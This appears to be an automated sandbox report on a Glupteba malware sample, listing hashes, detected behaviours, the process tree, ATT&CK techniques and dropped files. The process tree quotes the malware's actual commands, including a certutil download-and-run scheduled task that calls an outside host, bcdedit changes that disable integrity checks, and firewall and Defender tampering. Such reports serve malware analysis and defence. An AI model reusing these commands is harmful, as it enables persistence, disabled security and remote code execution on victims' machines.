Analysis

  • max time kernel
    150s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    04-03-2021 21:00

General

  • Target

    er.exe

  • Size

    4.0MB

  • MD5

    160dd398272fd4fdf51f410adad9a51b

  • SHA1

    f49489e7960978dd7dbb1784b0c67b1fd540926d

  • SHA256

    2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

  • SHA512

    8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 4 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 15 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 30 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 6 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Modifies system certificate store 2 TTPs 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\er.exe
    "C:\Users\Admin\AppData\Local\Temp\er.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;1648
      2⤵
      • Blocklisted process makes network request
      • Modifies registry class
      PID:1164
    • C:\Users\Admin\AppData\Local\Temp\er.exe
      "C:\Users\Admin\AppData\Local\Temp\er.exe"
      2⤵
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:692
      • C:\Windows\SysWOW64\rundll32.exe
        C:\Windows\system32\rundll32.exe C:\Windows\system32\gameux.dll,GameUXShim {5edb1ddd-6a21-414f-bc6e-e6e5379b875c};C:\Users\Admin\AppData\Local\Temp\er.exe;692
        3⤵
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:952
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies data under HKEY_USERS
          PID:2024
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe ""
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1584
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:1844
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:976
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1520
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:816
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1248
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:796
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:680
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:328
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:604
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1212
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1492
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1344
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:828
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1056
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1500
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1140
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:796
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:528
        • C:\Windows\windefender.exe
          "C:\Windows\windefender.exe"
          4⤵
          • Executes dropped EXE
          PID:628
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
            5⤵
              PID:1608
              • C:\Windows\SysWOW64\sc.exe
                sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
          • C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
            4⤵
            • Executes dropped EXE
            PID:904
          • C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2020
            • C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              PID:1488
          • C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
            4⤵
            • Executes dropped EXE
            PID:1900
            • C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe"
              5⤵
              • Executes dropped EXE
              PID:796
          • C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
            C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
            4⤵
            • Executes dropped EXE
            PID:1588
            • C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
              "C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe"
              5⤵
              • Executes dropped EXE
              PID:2088
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" http://humisnee.com/test.php?uuid=ff0348af-e2e5-49ec-9491-e980d37feaea&browser=chrome
                6⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:2192
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xbc,0xc0,0xc4,0x90,0xc8,0x7fef6206e00,0x7fef6206e10,0x7fef6206e20
                  7⤵
                    PID:2260
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1032,6807380835215427805,6139682239562725928,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1268 /prefetch:8
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:908
            • C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
              4⤵
              • Executes dropped EXE
              PID:2120
            • C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
              4⤵
              • Executes dropped EXE
              PID:2220
            • C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
              C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
              4⤵
              • Executes dropped EXE
              PID:2328
      • C:\Windows\windefender.exe
        C:\Windows\windefender.exe
        1⤵
        • Executes dropped EXE
        • Modifies data under HKEY_USERS
        PID:1808

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Command-Line Interface

      1
      T1059

      Scheduled Task

      1
      T1053

      Persistence

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Defense Evasion

      Disabling Security Tools

      2
      T1089

      Modify Registry

      4
      T1112

      Impair Defenses

      1
      T1562

      Install Root Certificate

      1
      T1130

      Credential Access

      Credentials in Files

      1
      T1081

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      Collection

      Data from Local System

      1
      T1005

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
        MD5

        b9def7f516a16683f89e5e7f4e44c125

        SHA1

        ab88110fb7724bf5c4b44bc1ec64b3bac016b9a0

        SHA256

        f35759a19d0889c1fabf924c249ed3b325fe8b8499d71106499b5f5d50f053ca

        SHA512

        457719e18b862af3c3ceaccef75ac2aef6838cf1377e7141daf238936ec7cadc6ad9626d82d8490bed0da2cc04fba6fee57eca9f781fd0821d12c53528e05f34

      • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        MD5

        d98e78fd57db58a11f880b45bb659767

        SHA1

        ab70c0d3bd9103c07632eeecee9f51d198ed0e76

        SHA256

        414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

        SHA512

        aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

      • C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        MD5

        941b755a404a616a55ea57ff4dbfe184

        SHA1

        946096ca05b666f9ef7c8bfb86a34a9435c24ab7

        SHA256

        9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

        SHA512

        6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

      • C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        MD5

        941b755a404a616a55ea57ff4dbfe184

        SHA1

        946096ca05b666f9ef7c8bfb86a34a9435c24ab7

        SHA256

        9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

        SHA512

        6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

      • C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe
        MD5

        1496f269a788b609062adbd300f2d18c

        SHA1

        93cca5098d5a87f673624dcc5ab7d9de4f4bbdf7

        SHA256

        9d41d85b30958480be3f7eeff32d2cf4ebe2f1c5790dedfd8cbac0a3c8b58f03

        SHA512

        527722a7fb5d68f441fab4550273166633e8a555eb04c060fba50bda7f9e72060a0fbe9e495905f26b72bd58a03a25ab6797e87ff187c1c37c14f41922ca0914

      • C:\Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        MD5

        0a13d106fa3997a0c911edd5aa0e147a

        SHA1

        36fae45bbb17d7c3fc2cc4807057636558a416e3

        SHA256

        5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

        SHA512

        ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

      • C:\Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        MD5

        d54ade674cb0c3e6d322ed7380e8adf6

        SHA1

        d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

        SHA256

        5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

        SHA512

        5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

      • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        MD5

        c6e81bac5a3385a0a9cef0bf9b45c624

        SHA1

        f52f673d68a66f212c25687aae6c054d89c9b47a

        SHA256

        3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

        SHA512

        328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

      • C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        MD5

        c6e81bac5a3385a0a9cef0bf9b45c624

        SHA1

        f52f673d68a66f212c25687aae6c054d89c9b47a

        SHA256

        3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

        SHA512

        328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

      • C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
        MD5

        9a4b7b0849a274f6f7ac13c7577daad8

        SHA1

        51219052fd31598113d1f30d938a560dd1434163

        SHA256

        c1d5a585fce188423d31df3ea806272f3daa5eb989e18e9ecf3d94b97b965f8e

        SHA512

        cd12f75e9198c88a3e1425c0c39956a50b10369074a3f35aba67868d3c02b5877bc6762292b35fbca37e80af4db6c02403ab3a9d1afc66ff38ce2f0d15fdcfce

      • C:\Windows\rss\csrss.exe
        MD5

        160dd398272fd4fdf51f410adad9a51b

        SHA1

        f49489e7960978dd7dbb1784b0c67b1fd540926d

        SHA256

        2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e

        SHA512

        8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4

      • C:\Windows\windefender.exe
        MD5

        6512ae7c9f36206f6433f78296102419

        SHA1

        abd1312c5727ac2a64ae5add1706d47cd65386eb

        SHA256

        6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

        SHA512

        a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

      • C:\Windows\windefender.exe
        MD5

        6512ae7c9f36206f6433f78296102419

        SHA1

        abd1312c5727ac2a64ae5add1706d47cd65386eb

        SHA256

        6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

        SHA512

        a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

      • C:\Windows\windefender.exe
        MD5

        6512ae7c9f36206f6433f78296102419

        SHA1

        abd1312c5727ac2a64ae5add1706d47cd65386eb

        SHA256

        6b9468efee35a8454a7fb395f43e5bdd14df918437661846d7d6ec199ba08883

        SHA512

        a6ece95ec60ac11b8454586f7a67a70b7bfc963691e79f0711b37280a647bddffb57b119b458d766f859841d775a56ebb43b2c63ad50b6fad6df8354ae51473f

      • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
        MD5

        d98e78fd57db58a11f880b45bb659767

        SHA1

        ab70c0d3bd9103c07632eeecee9f51d198ed0e76

        SHA256

        414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

        SHA512

        aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

      • \Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        MD5

        941b755a404a616a55ea57ff4dbfe184

        SHA1

        946096ca05b666f9ef7c8bfb86a34a9435c24ab7

        SHA256

        9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

        SHA512

        6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

      • \Users\Admin\AppData\Local\Temp\csrss\getfp.exe
        MD5

        941b755a404a616a55ea57ff4dbfe184

        SHA1

        946096ca05b666f9ef7c8bfb86a34a9435c24ab7

        SHA256

        9afabdf762ea2e412019ce0f6004f7fe1c948f2b36e1aab347e623fedd5ef440

        SHA512

        6a8afe8b6cfdeb86918b0eac83df316d43bc47bb8ba3a55c5ecb1fcc9aab36031f744b75f2afe53ff329b0a30aa3708332efda1592369c86fd12ae013335067a

      • \Users\Admin\AppData\Local\Temp\csrss\m672.exe
        MD5

        1496f269a788b609062adbd300f2d18c

        SHA1

        93cca5098d5a87f673624dcc5ab7d9de4f4bbdf7

        SHA256

        9d41d85b30958480be3f7eeff32d2cf4ebe2f1c5790dedfd8cbac0a3c8b58f03

        SHA512

        527722a7fb5d68f441fab4550273166633e8a555eb04c060fba50bda7f9e72060a0fbe9e495905f26b72bd58a03a25ab6797e87ff187c1c37c14f41922ca0914

      • \Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        MD5

        0a13d106fa3997a0c911edd5aa0e147a

        SHA1

        36fae45bbb17d7c3fc2cc4807057636558a416e3

        SHA256

        5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

        SHA512

        ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

      • \Users\Admin\AppData\Local\Temp\csrss\mg20201223-1.exe
        MD5

        0a13d106fa3997a0c911edd5aa0e147a

        SHA1

        36fae45bbb17d7c3fc2cc4807057636558a416e3

        SHA256

        5e46ecffcff9440e97bf4f0a85ad34132407f925b27a8759f5a01de5ea4da6af

        SHA512

        ae2a2c7bc9dfda5d6012a8bab80c7be92762bb63c6e73de4f6b21768faab2637d51c147defe454bf8504cc2845a1914bbbeb1519e0be3343380b011da3467da4

      • \Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        MD5

        d54ade674cb0c3e6d322ed7380e8adf6

        SHA1

        d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

        SHA256

        5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

        SHA512

        5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

      • \Users\Admin\AppData\Local\Temp\csrss\ml20201223.exe
        MD5

        d54ade674cb0c3e6d322ed7380e8adf6

        SHA1

        d10dd83f261a9e4fed3f86b6d4e798b7f3b14b73

        SHA256

        5191548b8edf4b98e623f055f5205e2db17aa220c28928b1da1c3a9ba1a75ee0

        SHA512

        5e0dba44f7dea3929b172b48e7c9492d06c59599cbc433f8be9e53c81935f1b5fe2dfb2404b41b7d9a7db39dedf1115ea23d454d2306f314af17f7ddeedc5065

      • \Users\Admin\AppData\Local\Temp\csrss\patch.exe
        MD5

        13aaafe14eb60d6a718230e82c671d57

        SHA1

        e039dd924d12f264521b8e689426fb7ca95a0a7b

        SHA256

        f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3

        SHA512

        ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

      • \Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        MD5

        c6e81bac5a3385a0a9cef0bf9b45c624

        SHA1

        f52f673d68a66f212c25687aae6c054d89c9b47a

        SHA256

        3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

        SHA512

        328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

      • \Users\Admin\AppData\Local\Temp\csrss\u20200626.exe
        MD5

        c6e81bac5a3385a0a9cef0bf9b45c624

        SHA1

        f52f673d68a66f212c25687aae6c054d89c9b47a

        SHA256

        3414ddda2d8e2d44f7e33cf513de0c6a10d593e0358ad55586657d42682ffb5c

        SHA512

        328d5e7fe15d22a0b23ada1be686363748c9c6beb90931bb1e58a7308e9a75f022236f7960408b89fba554a1d12deb1d047c9da9a8a45aeb494f192e594d4855

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

        1746d6d50c94e7b042af6d5fe798830e341031450b83a89755de3528e1b80e08b57bfc61aa7abe316545bc06878aedc1c272f9ef7c37c79dee119eb9f6c0bf6a

      • \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe
        MD5

        9c84377ef100ddb897aab7f8a923c01e

        SHA1

        9750679980141b268eb5c0d9e593d312e0069098

        SHA256

        c4e4c0b21deadaae00b3179724d8a63f9d03310c1ba81aeb3b13abc2b4ba9d6d

        SHA512

